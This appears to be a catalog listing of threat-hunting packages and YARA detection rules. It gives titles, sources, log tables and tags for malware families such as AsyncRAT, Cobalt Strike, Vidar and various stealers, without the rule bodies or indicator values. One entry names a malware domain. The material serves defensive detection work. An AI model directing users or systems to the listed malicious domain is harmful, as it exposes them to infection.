Hunt package for 28 malicious URLs tagged as 32-bit
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 7 malicious URLs tagged as 87-121-79-223
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 17 malicious URLs tagged as 94-249-230-150
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 2 malicious URLs tagged as botnet
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 4 malicious URLs tagged as ClearFake
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 5 malicious URLs tagged as d52f85
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 12 malicious URLs tagged as elf
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 7 malicious URLs tagged as malware_download
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 3 malicious URLs tagged as Mozi
Tags: ioc, urlhaus
visbot
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: visbot
Tags: community

dump sales order
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: dump_sales_order
Tags: community

Source: Yara-Rules
YARA rule: dump_sales_quote_payment
Tags: community

eval post
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: eval_post
Tags: community

fopo webshell
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: fopo_webshell
Tags: community, webshell

is elf
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: is_elf
Tags: community

Lost Door
Type: yara | Severity: low | Source: Yara-Rules
Lost Door
Tags: community

Source: Yara-Rules
LuckyCat code tricks
Tags: community

MacControl
Type: yara | Severity: low | Source: Yara-Rules
MacControl
Tags: community

Source: Yara-Rules
MacControl code tricks
Tags: community

Source: Yara-Rules
MacControl identifying strings
Tags: community

Source: Yara-Rules
YARA rule: md5_64651cede2467fdeb1b3b7e6ff3f81cb
Tags: community

Source: Yara-Rules
YARA rule: md5_6bf4910b01aa4f296e590b75a3d25642
Tags: community

moose
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: moose
Tags: community

Source: Yara-Rules
Detects strings from C#/VB stealers and QuasarRAT
Tags: backdoor, community, infostealer

spam mailer
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: spam_mailer
Tags: community
ThreatFox: Mirai IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents
Hunt package for 2 IOCs associated with Mirai
Tags: elf-mirai, ioc, threatfox

ThreatFox: Mozi IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DeviceFileEvents, UrlClickEvents
Hunt package for 70 IOCs associated with Mozi
Tags: elf-mozi, ioc, threatfox

Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 16 IOCs associated with ClearFake
Tags: ioc, js-clearfake, threatfox

Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 3 IOCs associated with SmartApeSG
Tags: ioc, js-smartapesg, threatfox

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents
Hunt package for 13 IOCs associated with Unknown malware
Tags: ioc, threatfox, unknown

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 3 IOCs associated with AdaptixC2
Tags: apt, ioc, threatfox, win-adaptix_c2

ThreatFox: AsyncRAT IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 17 IOCs associated with AsyncRAT
Tags: backdoor, ioc, threatfox, win-asyncrat

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents
Hunt package for 15 IOCs associated with Cobalt Strike
Tags: cobalt-strike, ioc, threatfox, win-cobalt_strike

ThreatFox: LockBit IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DnsEvents
Hunt package for 8 IOCs associated with LockBit
Tags: ioc, threatfox, win-lockbit

Source: ThreatFox
Tables: DnsEvents
Hunt package for 2 IOCs associated with Nanocore RAT
Tags: backdoor, ioc, threatfox, win-nanocore

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents
Hunt package for 7 IOCs associated with NetSupportManager RAT
Tags: backdoor, ioc, threatfox, win-netsupportmanager_rat

ThreatFox: Remcos IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 10 IOCs associated with Remcos
Tags: ioc, threatfox, win-remcos

ThreatFox: Remus IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents
Hunt package for 5 IOCs associated with Remus
Tags: ioc, threatfox, win-remus

ThreatFox: Vidar IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 10 IOCs associated with Vidar
Tags: ioc, threatfox, win-vidar

ThreatFox: VShell IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 12 IOCs associated with VShell
Tags: ioc, threatfox, win-vshell

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 52 malicious URLs tagged as 32-bit
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 5 malicious URLs tagged as botnet
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 7 malicious URLs tagged as ClearFake
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 6 malicious URLs tagged as malware_download
Tags: ioc, urlhaus

Source: URLhaus
Tables: CommonSecurityLog, DnsEvents
Hunt package for 5 malicious URLs tagged as Mozi
Tags: ioc, urlhaus
Source: Yara-Rules
The backdoor registers an auto-start service with the display name
Tags: backdoor, community

rule for cctv0
Type: yara | Severity: low | Source: Yara-Rules
Rule for CCTV0
Tags: community

Source: Yara-Rules
5-character code for LURK0
Tags: community

Source: Yara-Rules
http://malwared.ru
Tags: community

Source: Yara-Rules
Matches the default bot in the leaked KINS dropper (Zeus)
Tags: community

Source: Yara-Rules
Matches the protocol, process injection and Windows exploit present in the KINS dropper
Tags: community, exploit

korlia
Type: yara | Severity: low | Source: Yara-Rules
YARA rule: korlia
Tags: community

Source: Yara-Rules
IOC rule looking for events associated with the KORPLUG (PlugX) backdoor linked to Operation GreedyWonk activity.
Tags: backdoor, community

fileless malware
Type: yara | Severity: low | Source: Yara-Rules
Fileless malware
Tags: community

Source: Yara-Rules
Kwampirs dropper and main payload components
Tags: community, kwampirs

Source: Yara-Rules
Methodology signature looking for signs of lateral movement
Tags: community, lateral-movement

rule for lurk0
Type: yara | Severity: low | Source: Yara-Rules
Rule for LURK0
Tags: community

Source: Yara-Rules
5-character code for LURK0
Tags: community

Source: Yara-Rules
Identifies KeyBase, also known as Kibex.
Tags: community

Source: Yara-Rules
Internal names found in LURK0/CCTV0 samples
Tags: community
Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 25 IOCs associated with ClearFake
Tags: ioc, js-clearfake, threatfox

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with Creal Stealer
Tags: infostealer, ioc, py-creal_stealer, threatfox

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with Venus Stealer
Tags: infostealer, ioc, py-venus_stealer, threatfox

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents
Hunt package for 17 IOCs associated with Unknown malware
Tags: ioc, threatfox, unknown

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 6 IOCs associated with Agent Tesla
Tags: ioc, threatfox, win-agent_tesla

ThreatFox: AsyncRAT IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents
Hunt package for 20 IOCs associated with AsyncRAT
Tags: backdoor, ioc, threatfox, win-asyncrat

ThreatFox: BianLian IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 2 IOCs associated with BianLian
Tags: ioc, threatfox, win-bianlian

Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 14 IOCs associated with Cobalt Strike
Tags: cobalt-strike, ioc, threatfox, win-cobalt_strike

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with Luca Stealer
Tags: infostealer, ioc, threatfox, win-luca_stealer

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 6 IOCs associated with Nanocore RAT
Tags: backdoor, ioc, threatfox, win-nanocore

ThreatFox: NjRAT IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 6 IOCs associated with NjRAT
Tags: backdoor, ioc, threatfox, win-njrat

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with Phantom Stealer
Tags: infostealer, ioc, threatfox, win-phantom_stealer

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with poscardstealer
Tags: infostealer, ioc, threatfox, win-poscardstealer

ThreatFox: Remcos IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 10 IOCs associated with Remcos
Tags: ioc, threatfox, win-remcos

ThreatFox: TinyMet IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with TinyMet
Tags: ioc, threatfox, win-tinymet

Source: ThreatFox
Tables: CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, DnsEvents
Hunt package for 8 IOCs associated with ValleyRAT
Tags: backdoor, ioc, threatfox, win-valley_rat

ThreatFox: Vidar IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DnsEvents, UrlClickEvents
Hunt package for 15 IOCs associated with Vidar
Tags: ioc, threatfox, win-vidar

ThreatFox: VShell IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: CommonSecurityLog, DeviceNetworkEvents
Hunt package for 13 IOCs associated with VShell
Tags: ioc, threatfox, win-vshell

Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with WannaCryptor
Tags: ioc, threatfox, win-wannacryptor

ThreatFox: ZynorRAT IOCs
Type: ioc-hunt | Severity: high | Source: ThreatFox
Tables: DeviceFileEvents
Hunt package for 3 IOCs associated with ZynorRAT
Tags: backdoor, ioc, threatfox, win-zynor_rat
Source: Yara-Rules
Lenovo Superfish SSL interceptor - file VisualDiscovery.exe
Tags: community

iexpl0re family
Type: yara | Severity: low | Source: Yara-Rules
iexpl0re family
Tags: community

Source: Yara-Rules
iexpl0re code features
Tags: community

Source: Yara-Rules
Strings used by iexpl0re
Tags: community

IMuler
Type: yara | Severity: low | Source: Yara-Rules
IMuler
Tags: community

Source: Yara-Rules
IMuler code tricks
Tags: community

Source: Yara-Rules
IMuler identifying strings
Tags: community

Insta11
Type: yara | Severity: low | Source: Yara-Rules
Insta11
Tags: community

Source: Yara-Rules
Insta11 code features
Tags: community

Source: Yara-Rules
Insta11 identifying strings
Tags: community

Source: Yara-Rules
Dynamic DLL (malicious)
Tags: community

Source: Yara-Rules
Dynamic DLL abuse executable
Tags: community
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Kimwolf

apk-kimwolf, ioc, threatfox
ThreatFox: Evilginx IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Evilginx

elf-evilginx, ioc, threatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 5 IOCs associated with Mirai

elf-mirai, ioc, threatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with XMRIG

elf-xmrig, ioc, threatfox
ThreatFox source
DnsEvents

Hunt package for 48 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 2 IOCs associated with FAKEUPDATES

ioc, js-fakeupdates, threatfox
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 4 IOCs associated with SmartApeSG

ioc, js-smartapesg, threatfox
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 23 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 3 IOCs associated with Unknown RAT

backdoor, ioc, threatfox, unknown_rat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 13 IOCs associated with AdaptixC2

apt, ioc, threatfox, win-adaptix_c2
ThreatFox: Amadey IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

Hunt package for 2 IOCs associated with Amadey

ioc, threatfox, win-amadey
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 13 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 14 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 7 IOCs associated with DCRat

backdoor, ioc, threatfox, win-dcrat
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Havoc

ioc, threatfox, win-havoc
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Quasar RAT

backdoor, ioc, threatfox, win-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 14 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox: Sliver IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Sliver

ioc, threatfox, win-sliver
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 19 IOCs associated with Vidar

ioc, threatfox, win-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 12 IOCs associated with VShell

ioc, threatfox, win-vshell
Yara-Rules source

YARA rule: ce_enfal_cmstar_debug_msg

community
Enfal
yara low
Yara-Rules source

Enfal

community
Yara-Rules source

Detects a certain type of Enfal Malware

community
Yara-Rules source

Generic Rule to detect the Enfal Malware

community
Yara-Rules source

Enfal code tricks

community
Yara-Rules source

Enfal Identifying Strings

community
Ezcob
yara low
Yara-Rules source

Ezcob

community
Yara-Rules source

Ezcob Identifying Strings

community
Yara-Rules source

Favorite code features

community
Yara-Rules source

Favorite Identifying Strings

community
Yara-Rules source

Detects unmodified FUDCrypt samples

community
Glasses family
yara low
Yara-Rules source

Glasses family

community
Yara-Rules source

Glasses code features

community
Yara-Rules source

Strings used by Glasses

community
Win32.Gozi
yara low
Yara-Rules source

Win32.Gozi

community
Yara-Rules source

Grozlex Stealer - Possible HCStealer

community, infostealer
Yara-Rules source

Identifier for html variant of FAKEM

community
rc4_stack_key
yara low
Yara-Rules source

rc4_stack_key

community
Yara-Rules source

success_fail_codes

community
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with Mirai

elf-mirai, ioc, threatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 6 IOCs associated with RedTail

elf-redtail, ioc, threatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 5 IOCs associated with XMRIG

elf-xmrig, ioc, threatfox
ThreatFox source
DnsEvents

Hunt package for 78 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with FAKEUPDATES

ioc, js-fakeupdates, threatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 10 IOCs associated with KongTuke

ioc, js-kongtuke, threatfox
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 4 IOCs associated with SmartApeSG

ioc, js-smartapesg, threatfox
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

Hunt package for 3 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
DnsEvents

Hunt package for 4 IOCs associated with Unknown Loader

ioc, threatfox, unknown_loader
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 22 IOCs associated with Unknown RAT

backdoor, ioc, threatfox, unknown_rat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 4 IOCs associated with AdaptixC2

apt, ioc, threatfox, win-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 12 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox: Azorult IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents

Hunt package for 2 IOCs associated with Azorult

ioc, threatfox, win-azorult
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 16 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Coinminer

ioc, threatfox, win-coinminer
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with DCRat

backdoor, ioc, threatfox, win-dcrat
ThreatFox: Gh0stnet IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Gh0stnet

ioc, threatfox, win-ghostnet
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Havoc

ioc, threatfox, win-havoc
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Meterpreter

ioc, threatfox, win-meterpreter
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Nanocore RAT

backdoor, ioc, threatfox, win-nanocore
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 5 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

Hunt package for 3 IOCs associated with Remus

ioc, threatfox, win-remus
ThreatFox: SPICA IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 4 IOCs associated with SPICA

ioc, threatfox, win-spica
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 7 IOCs associated with ValleyRAT

backdoor, ioc, threatfox, win-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 42 IOCs associated with Vidar

ioc, threatfox, win-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 5 IOCs associated with VShell

ioc, threatfox, win-vshell
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 3 IOCs associated with XWorm

ioc, threatfox, win-xworm
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as 124-198-132-139

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 10 malicious URLs tagged as 32-bit

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as 54e64e

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as AgentTesla

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 10 malicious URLs tagged as ascii

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 10 malicious URLs tagged as ClearFake

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as elf

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as encrypted

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as GuLoader

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 13 malicious URLs tagged as hta

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 11 malicious URLs tagged as malware_download

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 7 malicious URLs tagged as opendir

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 4 malicious URLs tagged as rat

backdoor, ioc, urlhaus
Yara-Rules source

f0xy malware downloader

community
ThreatFox: Evilginx IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with Evilginx

elf-evilginx, ioc, threatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with Mirai

elf-mirai, ioc, threatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, UrlClickEvents

Hunt package for 8 IOCs associated with RedTail

elf-redtail, ioc, threatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 7 IOCs associated with XMRIG

elf-xmrig, ioc, threatfox
ThreatFox source
DnsEvents

Hunt package for 50 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 14 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 8 IOCs associated with Unknown Stealer

infostealer, ioc, threatfox, unknown_stealer
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with AdaptixC2

apt, ioc, threatfox, win-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 9 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox: Azorult IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents

Hunt package for 2 IOCs associated with Azorult

ioc, threatfox, win-azorult
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 21 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Coinminer

ioc, threatfox, win-coinminer
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 5 IOCs associated with DCRat

backdoor, ioc, threatfox, win-dcrat
ThreatFox: Gh0stnet IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Gh0stnet

ioc, threatfox, win-ghostnet
ThreatFox: Kimsuky IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 4 IOCs associated with Kimsuky

ioc, threatfox, win-kimsuky
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Luca Stealer

infostealer, ioc, threatfox, win-luca_stealer
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Phemedrone Stealer

infostealer, ioc, threatfox, win-phemedrone_stealer
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 12 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 2 IOCs associated with Remus

ioc, threatfox, win-remus
ThreatFox: Satacom IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 4 IOCs associated with Satacom

ioc, threatfox, win-satacom
ThreatFox: Stealc IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents, UrlClickEvents

Hunt package for 4 IOCs associated with Stealc

ioc, threatfox, win-stealc
ThreatFox source
DeviceFileEvents

Hunt package for 6 IOCs associated with Taurus Stealer

infostealer, ioc, threatfox, win-taurus_stealer
ThreatFox source
DeviceFileEvents

Hunt package for 6 IOCs associated with troystealer

infostealer, ioc, threatfox, win-troystealer
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 8 IOCs associated with ValleyRAT

backdoor, ioc, threatfox, win-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents

Hunt package for 6 IOCs associated with Vidar

ioc, threatfox, win-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 9 IOCs associated with VShell

ioc, threatfox, win-vshell
Elex DLL 32 bits
yara low
Yara-Rules source

Elex DLL 32 bits

community
Elex DLL 64 bits
yara low
Yara-Rules source

Elex DLL 64 bits

community
Yara-Rules source

Elex Service 32 bits

community
Yara-Rules source

Elex Service 64 bits

community
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 59 malicious URLs tagged as 32-bit

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 5 malicious URLs tagged as arm

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 26 malicious URLs tagged as ClearFake

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as dropped-by-Phorpiex

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 4 malicious URLs tagged as elf

ioc, urlhaus
Yara-Rules source

Athena HTTP identification

community
Yara-Rules source

Athena IRC v1.8.x, 2.x identification

community
Yara-Rules source

Generic signature for Hacktool.Atmos.Builder cracked version

community
Yara-Rules source

Generic Spyware.Citadel.Atmos Signature

community
Yara-Rules source

Second generic Spyware.Citadel.Atmos signature, for when the builder adds a packed layer

community
Bangat
yara low
Yara-Rules source

Bangat

community
Yara-Rules source

Bangat code features

community
Yara-Rules source

Bangat Identifying Strings

community
Batel backdoor
yara low
Yara-Rules source

Batel backdoor

backdoor, community
Yara-Rules source

Boouset code tricks

community
Yara-Rules source

Bublik Trojan Downloader

backdoor, community
Yara-Rules source

YARA rule: CAP_HookExKeylogger

community, infostealer
Yara-Rules source

Win32-variant of Chicken ident for both dropper and dropped file

community
Yara-Rules source

Linux-variant of Chicken ident for both dropper and dropped file

community
Cookies
yara low
Yara-Rules source

Cookies

community
Yara-Rules source

Cookies Identifying Strings

community
Yara-Rules source

Rule to detect the Corkow DLL files

community
Yara-Rules source

cxpid code features

community
Yara-Rules source

cxpid Identifying Strings

community
Yara-Rules source

Rule to detect ELF.DDosTf infection

community
Yara-Rules source

Derkziel info stealer (Steam, Opera, Yandex, ...)

community, infostealer
Yara-Rules source

Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b

backdoor, community
Yara-Rules source

Rule to detect Eicar pattern

community
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 3 IOCs associated with Mirai

elf-mirai, ioc, threatfox
ThreatFox source
DnsEvents

Hunt package for 74 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox: EtherRAT IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 6 IOCs associated with EtherRAT

backdoor, ioc, js-ether_rat, threatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 3 IOCs associated with KongTuke

ioc, js-kongtuke, threatfox
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 3 IOCs associated with SmartApeSG

ioc, js-smartapesg, threatfox
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 4 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
DnsEvents

Hunt package for 5 IOCs associated with Unknown Loader

ioc, threatfox, unknown_loader
ThreatFox source
